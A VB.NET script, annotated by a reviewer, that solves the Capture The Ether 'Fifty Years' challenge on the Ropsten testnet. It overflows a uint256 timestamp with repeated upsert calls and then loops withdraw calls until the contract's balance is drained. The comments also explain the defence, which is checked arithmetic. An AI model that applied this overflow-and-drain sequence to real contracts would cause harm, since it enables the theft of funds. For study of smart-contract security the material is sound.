Exploit Sequence for Fifty Years challenge on Capture The Ether
''' <summary>
''' Replays the author's transaction sequence for the Capture The Ether "Fifty Years"
''' training challenge against one challenge instance on the Ropsten test network.
''' It sends five payable <c>upsert</c> calls, one <c>withdraw</c>, and then a loop of
''' zero-value <c>upsert</c>/<c>upsert</c>/<c>withdraw</c> triples, and finally prints
''' a message when the contract balance reads zero.
''' </summary>
''' <remarks>
''' The contract source is not part of this listing; the behaviour described in the inline
''' comments (timestamp overflow, "head" being reset) is the author's description and cannot
''' be confirmed from this code alone.
''' Defensive takeaway: per those comments the sequence depends on uint256 timestamp
''' arithmetic that wraps silently. Checked arithmetic (the default since Solidity 0.8,
''' SafeMath on older compilers) makes such an addition revert instead of wrapping.
''' NOTE(review): every call result is stored or discarded without being inspected, so the
''' routine gives no indication if a transaction was mined but reverted.
''' </remarks>
Private Async Sub testContract()
' Placeholder only. A real private key must never be pasted into source or a public gist;
' load it at run time from an environment variable or a secret store instead.
Dim privateKey As New Nethereum.Signer.EthECKey("<enterprivatekeyhere>")
Dim account = New Nethereum.Web3.Accounts.Account(privateKey)
' ABI of the deployed contract (only the ABI is present here, no bytecode).
' It declares withdraw(index), upsert(index, timestamp) [payable], isComplete() and a payable
' constructor. isComplete() is never called by this routine.
Dim abi = "[{""constant"":false,""inputs"":[{""name"":""index"",""type"":""uint256""}],""name"":""withdraw"",""outputs"":[],""payable"":false,""stateMutability"":""nonpayable"",""type"":""function""},{""constant"":false,""inputs"":[{""name"":""index"",""type"":""uint256""},{""name"":""timestamp"",""type"":""uint256""}],""name"":""upsert"",""outputs"":[],""payable"":true,""stateMutability"":""payable"",""type"":""function""},{""constant"":true,""inputs"":[],""name"":""isComplete"",""outputs"":[{""name"":"""",""type"":""bool""}],""payable"":false,""stateMutability"":""view"",""type"":""function""},{""inputs"":[{""name"":""player"",""type"":""address""}],""payable"":true,""stateMutability"":""payable"",""type"":""constructor""}]"
' Client bound to the signing account and the Ropsten endpoint named in the URL.
Dim iweb3 = New Web3(account, "https://ropsten.infura.io/")
' Address of the author's own challenge instance; it is specific to that deployment.
Dim tokenContractAddress = "0x4723B3521e0f62F48527C3E1C022F95bd1223E52"
Dim tokencontract = iweb3.Eth.GetContract(abi, tokenContractAddress)
' Fixed gas limit and gas price (5000000000 wei = 5 gwei) reused for every transaction.
Dim gas As New HexBigInteger(100000)
Dim value As New HexBigInteger(0)
Dim gasPrice As New HexBigInteger(5000000000)
' This literal equals 2^256 - 86400. 86400 is the number of seconds in one day, so adding
' one day to it in unchecked uint256 arithmetic wraps around to exactly 0.
Dim maxUIntMinusOneDay As BigInteger = BigInteger.Parse("115792089237316195423570985008687907853269984665640564039457584007913129553536")
Dim setZero As UInt32 = 0
Dim set86400 As UInt32 = 86400
' Reused as the "index" argument of upsert/withdraw.
Dim sentValue As UInt32
Dim upsert = tokencontract.GetFunction("upsert")
' NOTE(review): despite the name, this receives the awaited result of
' SendTransactionAndWaitForReceiptAsync, and it is never read afterwards.
Dim transactionHash As Object

' In every call below the empty argument slot (", ,") leaves an optional parameter at its
' default - presumably the receipt cancellation token; confirm against the Nethereum
' version in use. The arguments after it are the contract function inputs.

' First upsert: index 1, timestamp maxUIntMinusOneDay, sending 1 wei.
' Author's note: prepares the timestamp overflow.
value = New HexBigInteger(1) ' 1 wei
' Assigning a BigInteger to a UInt32 is a narrowing conversion;
' NOTE(review): this appears to compile only with Option Strict Off - confirm.
sentValue = value.Value
transactionHash = Await upsert.SendTransactionAndWaitForReceiptAsync(account.Address, gas, gasPrice, value, , sentValue, maxUIntMinusOneDay)
' Second upsert: index 2, timestamp 0, sending 2 wei.
value = New HexBigInteger(2)
sentValue = value.Value
transactionHash = Await upsert.SendTransactionAndWaitForReceiptAsync(account.Address, gas, gasPrice, value, , sentValue, setZero)
' Third upsert: index 3, timestamp 86400, sending 3 wei.
value = New HexBigInteger(3)
sentValue = value.Value
transactionHash = Await upsert.SendTransactionAndWaitForReceiptAsync(account.Address, gas, gasPrice, value, , sentValue, set86400)
' Fourth upsert: index 4, timestamp maxUIntMinusOneDay, sending 4 wei.
' Author's note: prepares to overflow the timestamp again.
value = New HexBigInteger(4)
sentValue = value.Value
transactionHash = Await upsert.SendTransactionAndWaitForReceiptAsync(account.Address, gas, gasPrice, value, , sentValue, maxUIntMinusOneDay)
' Fifth upsert: index 5, timestamp 0, sending 5 wei.
' Author's note: setting the timestamp to 0 also sets the contract's "head" to zero, after
' which the bulk of the ether held by the contract can be withdrawn. The contract source is
' not shown here, so this is the author's description rather than something visible in
' this code.
value = New HexBigInteger(5)
sentValue = value.Value
transactionHash = Await upsert.SendTransactionAndWaitForReceiptAsync(account.Address, gas, gasPrice, value, , sentValue, setZero)
Dim withdraw = tokencontract.GetFunction("withdraw")
sentValue = 3
value = New HexBigInteger(0)
' Withdraw at index 3; no ether is attached (withdraw is non-payable in the ABI).
transactionHash = Await withdraw.SendTransactionAndWaitForReceiptAsync(account.Address, gas, gasPrice, value, , sentValue)
' From here on no ether is sent with the transactions.
' The remaining contract balance (in wei) is read once and used as the loop bound.
' NOTE(review): the original comment said "(balance - 1)", but the loop below runs
' balance.Value times; the bound is not refreshed inside the loop.
Dim balance = Await iweb3.Eth.GetBalance.SendRequestAsync(tokenContractAddress)
Dim i As Integer = 0
value = New HexBigInteger(0)
sentValue = value.Value
While i < balance.Value
' Each pass sends three zero-value transactions: upsert(0, maxUIntMinusOneDay),
' upsert(0, 0), then withdraw(0). Author's note: overflow the timestamp so it expires,
' then withdraw 1 wei; repeat until empty.
value = New HexBigInteger(0)
sentValue = value.Value
Await upsert.SendTransactionAndWaitForReceiptAsync(account.Address, gas, gasPrice, New HexBigInteger(0), , 0, maxUIntMinusOneDay)
Await upsert.SendTransactionAndWaitForReceiptAsync(account.Address, gas, gasPrice, New HexBigInteger(0), , 0, setZero)
Await withdraw.SendTransactionAndWaitForReceiptAsync(account.Address, gas, gasPrice, value, , sentValue)
i += 1
End While
' Re-read the contract balance; the message is printed only when it is exactly zero.
balance = Await iweb3.Eth.GetBalance.SendRequestAsync(tokenContractAddress)
If balance.Value = 0 Then
Debug.Print("Finally!")
End If
End Sub